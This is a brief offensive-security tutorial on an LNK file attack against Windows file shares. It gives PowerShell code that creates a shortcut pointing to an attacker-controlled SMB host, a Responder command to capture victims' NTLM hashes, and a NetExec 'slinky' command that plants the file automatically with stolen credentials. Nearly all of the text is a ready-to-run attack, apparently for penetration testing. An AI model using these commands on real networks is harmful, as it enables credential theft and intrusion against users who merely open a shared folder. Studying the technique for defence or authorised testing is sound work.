LNK File Attack

Introduction

A kind of watering hole attack where an attacker places a malicious file on a network share. When the victim opens the share, the attacker can get the hash of the victim. Once you open the file share where the LNK file is placed, it will trigger, and responder will capture the hashes.

Creating LNK File Using PowerShell

Run the following line by line on an elevated PowerShell prompt. This will generate a file that you can place to a file share.

Make sure you name the lnk file so that it would be displayed first inside the folder.

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\~test.lnk")
$lnk.TargetPath = "\\[Attaker IP]\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Capturing Hashes Using Responder

sudo responder -I eth0 -dPv

Automated Attack Using CME/NetExec

netexec smb [Target IP] -d [Domain] -u [Username] -p [Password] -M slinky -o NAME=[Filename] SERVER=[Attacker IP]